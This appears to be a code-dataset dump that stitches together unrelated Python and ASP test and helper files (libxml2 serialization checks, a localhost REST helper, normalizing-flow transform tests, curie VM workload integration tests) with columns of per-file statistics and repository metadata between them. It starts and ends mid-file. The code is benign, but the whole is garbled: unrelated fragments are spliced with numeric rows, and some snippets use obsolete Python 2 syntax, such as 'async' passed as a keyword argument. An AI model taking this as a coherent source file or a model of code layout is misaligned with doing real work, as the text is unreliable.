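    attn_masks = [1] * len(piece_idxs) + [0] * pad_num
    return piece_idxs + [0] * pad_num, attn_masks

padded, mask = pad_to_length([101, 7592, 102], 6)
print(padded)  # [101, 7592, 102, 0, 0, 0]
print(mask)    # [1, 1, 1, 0, 0, 0]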
| 38.996016
| 120
| 0.617695
| 1,058
| 9,788
| 5.335539
| 0.104915
| 0.054207
| 0.05527
| 0.031887
| 0.871391
| 0.854562
| 0.84411
| 0.830647
| 0.830647
| 0.818069
| 0
| 0.002788
| 0.303739
| 9,788
| 250
| 121
| 39.152
| 0.825532
| 0.016755
| 0
| 0.762376
| 0
| 0
| 0.042067
| 0
| 0
| 0
| 0
| 0
| 0.009901
| 1
| 0.059406
| false
| 0
| 0.004951
| 0.019802
| 0.10396
| 0.009901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91753e7ffeb9c0adb1dc756ee840345dd8bf1683
| 4,259
|
py
|
Python
|
python/tests/serialize.py
|
balabit-deps/libxml2
|
e0c76087bdd489ebed32158d2debb7d3a2fbfcb2
|
[
"MIT"
] | 4
|
2017-05-04T15:50:48.000Z
|
2020-07-30T03:52:07.000Z
|
python/tests/serialize.py
|
balabit-deps/libxml2
|
e0c76087bdd489ebed32158d2debb7d3a2fbfcb2
|
[
"MIT"
] | 5
|
2018-07-18T19:07:02.000Z
|
2018-07-30T17:08:11.000Z
|
python/tests/serialize.py
|
balabit-deps/libxml2
|
e0c76087bdd489ebed32158d2debb7d3a2fbfcb2
|
[
"MIT"
] | 17
|
2015-03-18T02:02:54.000Z
|
2021-06-14T16:13:56.000Z
|
#!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
#
# Testing XML document serialization
#
doc = libxml2.parseDoc("""<root><foo>hello</foo></root>""")
str = doc.serialize()
if str != """<?xml version="1.0"?>
<root><foo>hello</foo></root>
""":
print "error serializing XML document 1"
sys.exit(1)
str = doc.serialize("iso-8859-1")
if str != """<?xml version="1.0" encoding="iso-8859-1"?>
<root><foo>hello</foo></root>
""":
print "error serializing XML document 2"
sys.exit(1)
str = doc.serialize(format=1)
if str != """<?xml version="1.0"?>
<root>
<foo>hello</foo>
</root>
""":
print "error serializing XML document 3"
sys.exit(1)
str = doc.serialize("iso-8859-1", 1)
if str != """<?xml version="1.0" encoding="iso-8859-1"?>
<root>
<foo>hello</foo>
</root>
""":
print "error serializing XML document 4"
sys.exit(1)
#
# Test serializing a subnode
#
root = doc.getRootElement()
str = root.serialize()
if str != """<root><foo>hello</foo></root>""":
print "error serializing XML root 1"
sys.exit(1)
str = root.serialize("iso-8859-1")
if str != """<root><foo>hello</foo></root>""":
print "error serializing XML root 2"
sys.exit(1)
str = root.serialize(format=1)
if str != """<root>
<foo>hello</foo>
</root>""":
print "error serializing XML root 3"
sys.exit(1)
str = root.serialize("iso-8859-1", 1)
if str != """<root>
<foo>hello</foo>
</root>""":
print "error serializing XML root 4"
sys.exit(1)
doc.freeDoc()
#
# Testing HTML document serialization
#
doc = libxml2.htmlParseDoc("""<html><head><title>Hello</title><body><p>hello</body></html>""", None)
str = doc.serialize()
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><head><title>Hello</title></head><body><p>hello</p></body></html>
""":
print "error serializing HTML document 1"
sys.exit(1)
str = doc.serialize("ISO-8859-1")
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Hello</title></head><body><p>hello</p></body></html>
""":
print "error serializing HTML document 2"
sys.exit(1)
str = doc.serialize(format=1)
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>
""":
print "error serializing HTML document 3"
sys.exit(1)
str = doc.serialize("iso-8859-1", 1)
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>
""":
print "error serializing HTML document 4"
sys.exit(1)
#
# Test serializing a subnode
#
doc.htmlSetMetaEncoding(None)
root = doc.getRootElement()
str = root.serialize()
if str != """<html><head><title>Hello</title></head><body><p>hello</p></body></html>""":
print "error serializing HTML root 1"
sys.exit(1)
str = root.serialize("ISO-8859-1")
if str != """<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Hello</title></head><body><p>hello</p></body></html>""":
print "error serializing HTML root 2"
sys.exit(1)
str = root.serialize(format=1)
if str != """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>""":
print "error serializing HTML root 3"
sys.exit(1)
str = root.serialize("iso-8859-1", 1)
if str != """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>""":
print "error serializing HTML root 4"
sys.exit(1)
doc.freeDoc()
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
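# Hedged aside (stdlib only; this is not the libxml2 binding exercised above): the same
# round-trip idea -- parse, serialize, compare -- written against xml.dom.minidom.
import xml.dom.minidom as minidom
doc3 = minidom.parseString("<root><foo>hello</foo></root>")
if doc3.documentElement.toxml() != "<root><foo>hello</foo></root>":
    raise SystemExit("error serializing XML document")
print("OK")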
| 28.205298
| 160
| 0.652501
| 656
| 4,259
| 4.23628
| 0.117378
| 0.028787
| 0.120907
| 0.047499
| 0.872976
| 0.847067
| 0.847067
| 0.833393
| 0.804966
| 0.781936
| 0
| 0.043932
| 0.123503
| 4,259
| 150
| 161
| 28.393333
| 0.700509
| 0.044142
| 0
| 0.71875
| 0
| 0.101563
| 0.621055
| 0.197485
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015625
| null | null | 0.140625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
532671b8d65148b87624d7fde0c082cfc30e75b3
| 1,081
|
py
|
Python
|
tests/helper.py
|
LeightonStreet/LingoBarter
|
3fffd95c38973ca9b9ce284070522ba758efe489
|
[
"Apache-2.0"
] | 7
|
2016-01-22T05:01:52.000Z
|
2019-02-07T10:23:12.000Z
|
tests/helper.py
|
LeightonStreet/LeightonStreet
|
3fffd95c38973ca9b9ce284070522ba758efe489
|
[
"Apache-2.0"
] | 6
|
2016-03-26T23:32:47.000Z
|
2016-04-01T07:10:42.000Z
|
tests/helper.py
|
LeightonStreet/LeightonStreet
|
3fffd95c38973ca9b9ce284070522ba758efe489
|
[
"Apache-2.0"
] | 1
|
2016-03-26T23:31:00.000Z
|
2016-03-26T23:31:00.000Z
|
import requests
import json
url_base = "http://localhost:8080/api/v1"
def post(endpoint, auth=None, **kwargs):
headers = {'content-type': 'application/json'}
if auth:
headers['Authentication-Token'] = auth
payload = json.dumps(kwargs)
r = requests.post(url_base + endpoint, data=payload, headers=headers)
print r.text
return r.json()
def get(endpoint, auth=None):
headers = {}
if auth:
headers['Authentication-Token'] = auth
r = requests.get(url_base + endpoint, headers=headers)
print r.text
return r.json()
def put(endpoint, auth=None, **kwargs):
headers = {'content-type': 'application/json'}
if auth:
headers['Authentication-Token'] = auth
payload = json.dumps(kwargs)
r = requests.put(url_base + endpoint, data=payload, headers=headers)
print r.text
return r.json()
def delete(endpoint, auth=None):
headers = {}
if auth:
headers['Authentication-Token'] = auth
r = requests.delete(url_base + endpoint, headers=headers)
print r.text
return r.json()
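# Hedged illustration (self-contained): the pattern shared by the four helpers above --
# a header dict is extended with the token only when auth is supplied.
def build_headers(auth=None, json_body=False):
    headers = {'content-type': 'application/json'} if json_body else {}
    if auth:
        headers['Authentication-Token'] = auth
    return headers

print(build_headers())  # {}
print(build_headers('tok123', json_body=True))  # content-type plus Authentication-Token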
| 25.139535
| 73
| 0.651249
| 137
| 1,081
| 5.10219
| 0.240876
| 0.050072
| 0.091559
| 0.154506
| 0.874106
| 0.874106
| 0.874106
| 0.874106
| 0.874106
| 0.869814
| 0
| 0.005889
| 0.214616
| 1,081
| 42
| 74
| 25.738095
| 0.817432
| 0
| 0
| 0.666667
| 0
| 0
| 0.151711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.060606
| null | null | 0.121212
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7259e20c21bac0d8747efd22f2970d13a1bb4607
| 4,827
|
py
|
Python
|
neural_spline_flows/nde/transforms/autoregressive_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/autoregressive_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/autoregressive_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
"""Tests for the autoregressive transforms."""
import torch
import unittest
from neural_spline_flows.nde.transforms import autoregressive
from neural_spline_flows.nde.transforms.transform_test import TransformTest
class MaskedAffineAutoregressiveTransformTest(TransformTest):
def test_forward(self):
batch_size = 10
features = 20
inputs = torch.randn(batch_size, features)
for use_residual_blocks, random_mask in [(False, False),
(False, True),
(True, False)]:
with self.subTest(use_residual_blocks=use_residual_blocks,
random_mask=random_mask):
transform = autoregressive.MaskedAffineAutoregressiveTransform(
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=use_residual_blocks,
random_mask=random_mask,
)
outputs, logabsdet = transform(inputs)
self.assert_tensor_is_good(outputs, [batch_size, features])
self.assert_tensor_is_good(logabsdet, [batch_size])
def test_inverse(self):
batch_size = 10
features = 20
inputs = torch.randn(batch_size, features)
for use_residual_blocks, random_mask in [(False, False),
(False, True),
(True, False)]:
with self.subTest(use_residual_blocks=use_residual_blocks,
random_mask=random_mask):
transform = autoregressive.MaskedAffineAutoregressiveTransform(
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=use_residual_blocks,
random_mask=random_mask,
)
outputs, logabsdet = transform.inverse(inputs)
self.assert_tensor_is_good(outputs, [batch_size, features])
self.assert_tensor_is_good(logabsdet, [batch_size])
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.randn(batch_size, features)
self.eps = 1e-6
for use_residual_blocks, random_mask in [(False, False),
(False, True),
(True, False)]:
with self.subTest(use_residual_blocks=use_residual_blocks,
random_mask=random_mask):
transform = autoregressive.MaskedAffineAutoregressiveTransform(
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=use_residual_blocks,
random_mask=random_mask,
)
self.assert_forward_inverse_are_consistent(transform, inputs)
class MaskedPiecewiseLinearAutoregressiveTransformTest(TransformTest):
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.rand(batch_size, features)
self.eps = 1e-3
transform = autoregressive.MaskedPiecewiseLinearAutoregressiveTransform(
num_bins=10,
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=True
)
self.assert_forward_inverse_are_consistent(transform, inputs)
class MaskedPiecewiseQuadraticAutoregressiveTransformTest(TransformTest):
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.rand(batch_size, features)
self.eps = 1e-4
transform = autoregressive.MaskedPiecewiseQuadraticAutoregressiveTransform(
num_bins=10,
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=True
)
self.assert_forward_inverse_are_consistent(transform, inputs)
class MaskedPiecewiseCubicAutoregressiveTransformTest(TransformTest):
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.rand(batch_size, features)
self.eps = 1e-3
transform = autoregressive.MaskedPiecewiseCubicAutoregressiveTransform(
num_bins=10,
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=True
)
self.assert_forward_inverse_are_consistent(transform, inputs)
if __name__ == '__main__':
unittest.main()
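# Hedged illustration (self-contained, assumes only torch): the property these tests
# assert -- inverse(forward(x)) ~= x -- shown for a fixed elementwise affine transform.
import torch

def forward(x, scale, shift):
    logabsdet = torch.log(torch.abs(scale)).sum().expand(x.shape[0])
    return x * scale + shift, logabsdet

def inverse(y, scale, shift):
    return (y - shift) / scale

x = torch.randn(10, 20)
scale, shift = torch.rand(20) + 0.5, torch.randn(20)
y, logabsdet = forward(x, scale, shift)
assert torch.allclose(inverse(y, scale, shift), x, atol=1e-5)
print(logabsdet.shape)  # torch.Size([10])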
| 37.710938
| 83
| 0.593122
| 432
| 4,827
| 6.300926
| 0.157407
| 0.072741
| 0.112417
| 0.076047
| 0.808597
| 0.808597
| 0.780309
| 0.780309
| 0.780309
| 0.759368
| 0
| 0.017694
| 0.344313
| 4,827
| 127
| 84
| 38.007874
| 0.842338
| 0.008287
| 0
| 0.761905
| 0
| 0
| 0.001673
| 0
| 0
| 0
| 0
| 0
| 0.07619
| 1
| 0.057143
| false
| 0
| 0.038095
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72cbeab123c2f866ce1d76db93cc0446e80628ec
| 429
|
py
|
Python
|
tests/parser/aggregates.count.assignment.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.assignment.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.assignment.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% Atom bug shouldn't be derived, as the body of the rule
% should be false. Auxiliary atoms shouldn't be printed
% out, as they are censored.
d(1).
d(2).
d(3).
bug :- 1 < #count{V : d(V)} <= 2.
"""
output = """
% Atom bug shouldn't be derived, as the body of the rule
% should be false. Auxiliary atoms shouldn't be printed
% out, as they are censored.
d(1).
d(2).
d(3).
bug :- 1 < #count{V : d(V)} <= 2.
"""
| 17.16
| 56
| 0.608392
| 80
| 429
| 3.2625
| 0.35
| 0.122605
| 0.153257
| 0.114943
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0
| 0.029851
| 0.219114
| 429
| 24
| 57
| 17.875
| 0.749254
| 0
| 0
| 0.888889
| 0
| 0
| 0.927739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72e55488c020422bbe099fd9e02bb81a50ee9ef4
| 11,705
|
py
|
Python
|
tests/integration/steps/test_workload.py
|
mike0615/curie
|
e25691f465c23cf53c39be157fcfa2eea4978b26
|
[
"MIT"
] | 4
|
2019-02-26T05:18:13.000Z
|
2020-07-15T00:34:41.000Z
|
tests/integration/steps/test_workload.py
|
nutanix/curie
|
e25691f465c23cf53c39be157fcfa2eea4978b26
|
[
"MIT"
] | 3
|
2021-03-31T18:55:50.000Z
|
2021-04-20T17:13:31.000Z
|
tests/integration/steps/test_workload.py
|
mike0615/curie
|
e25691f465c23cf53c39be157fcfa2eea4978b26
|
[
"MIT"
] | 2
|
2020-01-09T02:24:00.000Z
|
2020-11-04T23:09:02.000Z
|
#
# Copyright (c) 2016 Nutanix Inc. All rights reserved.
#
#
import os
import random
import string
import time
import unittest
import gflags
from curie.exception import CurieTestException
from curie.name_util import NameUtil
from curie.scenario import Scenario
from curie import steps
from curie.vm_group import VMGroup
from curie.workload import Workload
from curie.testing import environment, util
class TestIntegrationStepsWorkload(unittest.TestCase):
_multiprocess_can_split_ = True
def setUp(self):
self.cluster = util.cluster_from_json(gflags.FLAGS.cluster_config_path)
self.cluster.update_metadata(False)
self.group_name = "".join(
[random.choice(string.printable)
for _ in xrange(VMGroup.MAX_NAME_LENGTH)])
self.workload_name = "".join(
[random.choice(string.printable) for _ in xrange(40)])
self.scenario = Scenario(
cluster=self.cluster,
source_directory=os.path.join(environment.resource_dir(), "fio"),
output_directory=environment.test_output_dir(self),
goldimages_directory=gflags.FLAGS.curie_vmdk_goldimages_dir)
self.valid_fio_path = "oltp.fio"
self.invalid_fio_path = "not-a-file.bogus"
def tearDown(self):
test_vms, _ = NameUtil.filter_test_vms(self.cluster.vms(),
[self.scenario.id])
self.cluster.power_off_vms(test_vms)
self.cluster.delete_vms(test_vms)
def test_prefill(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.PrefillStart(self.scenario, self.workload_name)()
def test_prefill_async(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.PrefillStart(self.scenario, self.workload_name,
async=True)()
steps.workload.PrefillWait(self.scenario, self.workload_name)()
def test_prefill_invalid_fio_path(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.invalid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
with self.assertRaises(CurieTestException):
steps.workload.PrefillStart(self.scenario, self.workload_name)()
def test_PrefillRun_default(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.PrefillRun(self.scenario, self.workload_name)()
def test_PrefillRun_invalid_fio_path(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.invalid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
with self.assertRaises(CurieTestException):
steps.workload.PrefillRun(self.scenario, self.workload_name)()
def test_start_default(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.Start(self.scenario, self.workload_name, 30)()
def test_start_async(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.Start(self.scenario, self.workload_name, 30, async=True)()
steps.workload.Wait(self.scenario, self.workload_name)()
def test_invalid_fio_path(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.invalid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
with self.assertRaises(CurieTestException):
steps.workload.Start(self.scenario, self.workload_name, 30)()
def test_wait_after_finish(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 30
steps.workload.Start(self.scenario, self.workload_name, duration_secs)()
steps.workload.Wait(self.scenario, self.workload_name)()
def test_wait_after_stop_test(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 120
# Set should_stop to return False for 15 seconds, and True after that.
self.scenario.should_stop = util.return_until(False, True,
duration_secs / 8)
start_secs = time.time()
steps.workload.Start(self.scenario, self.workload_name, duration_secs)()
total_secs = time.time() - start_secs
self.assertTrue(total_secs < duration_secs)
def test_Stop(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 600
start_secs = time.time()
steps.workload.Start(self.scenario, self.workload_name, duration_secs,
async=True)()
time.sleep(30)
steps.workload.Stop(self.scenario, self.workload_name, duration_secs)()
total_secs = time.time() - start_secs
self.assertTrue(total_secs < duration_secs)
def test_Stop_inaccessible(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 600
start_secs = time.time()
steps.workload.Start(self.scenario, self.workload_name, duration_secs,
async=True)()
time.sleep(30)
steps.vm_group.PowerOff(self.scenario, self.group_name)()
steps.workload.Stop(self.scenario, self.workload_name, duration_secs)()
total_secs = time.time() - start_secs
self.assertTrue(total_secs < duration_secs)
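# Hedged aside (an assumption about util.return_until's contract, inferred from the
# comment preceding its use above): a callable that returns the first value until
# `secs` have elapsed and the second value afterwards, letting should_stop flip mid-run.
import time

def return_until(first, second, secs):
    start = time.time()
    def fn():
        return first if time.time() - start < secs else second
    return fn

should_stop = return_until(False, True, 0.05)
print(should_stop())  # False: still inside the window
time.sleep(0.06)
print(should_stop())  # True: the window has elapsed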
| 50.452586
| 77
| 0.67578
| 1,444
| 11,705
| 5.25554
| 0.088643
| 0.147055
| 0.113849
| 0.102385
| 0.84807
| 0.84807
| 0.84807
| 0.844775
| 0.835683
| 0.82356
| 0
| 0.025393
| 0.21273
| 11,705
| 231
| 78
| 50.670996
| 0.798155
| 0.010337
| 0
| 0.735577
| 0
| 0
| 0.019953
| 0
| 0
| 0
| 0
| 0
| 0.028846
| 0
| null | null | 0
| 0.0625
| null | null | 0.009615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72ea65f135076993cc3ec0ccc3e727454bc26e8e
| 98
|
py
|
Python
|
test_random.py
|
ishmeet-raina/hello-github-actions
|
7a2ac4ac6f222cf737dd757fa725814ab831efc5
|
[
"MIT"
] | null | null | null |
test_random.py
|
ishmeet-raina/hello-github-actions
|
7a2ac4ac6f222cf737dd757fa725814ab831efc5
|
[
"MIT"
] | 4
|
2020-12-21T12:19:24.000Z
|
2020-12-21T13:47:51.000Z
|
test_random.py
|
ishmeet-raina/hello-github-actions
|
7a2ac4ac6f222cf737dd757fa725814ab831efc5
|
[
"MIT"
] | null | null | null |
import pytest
from run_file import random_gen
def test_random_stuff():
assert 1 == random_gen()
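# Hedged aside (a sketch, not the real run_file module): asserting equality against a
# random generator only passes reliably when the generator is deterministic. A seeded
# stand-in, random_gen_sketch, illustrating the contract the test assumes:
import random

def random_gen_sketch(seed=0):
    random.seed(seed)
    return random.randint(1, 1)  # degenerate range: always returns 1

assert 1 == random_gen_sketch()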
| 19.6
| 31
| 0.785714
| 16
| 98
| 4.5
| 0.75
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011905
| 0.142857
| 98
| 4
| 32
| 24.5
| 0.845238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72f858702bab153f01272ef17911d5270f8d17bd
| 34,718
|
py
|
Python
|
apps/charts/views.py
|
kwarodom/bemoss_web_ui-1
|
6c65c49b8f52bc7d189c9f2391f9098ec0f2dd92
|
[
"Unlicense"
] | null | null | null |
apps/charts/views.py
|
kwarodom/bemoss_web_ui-1
|
6c65c49b8f52bc7d189c9f2391f9098ec0f2dd92
|
[
"Unlicense"
] | null | null | null |
apps/charts/views.py
|
kwarodom/bemoss_web_ui-1
|
6c65c49b8f52bc7d189c9f2391f9098ec0f2dd92
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Copyright (c) 2016, Virginia Tech
All rights reserved.
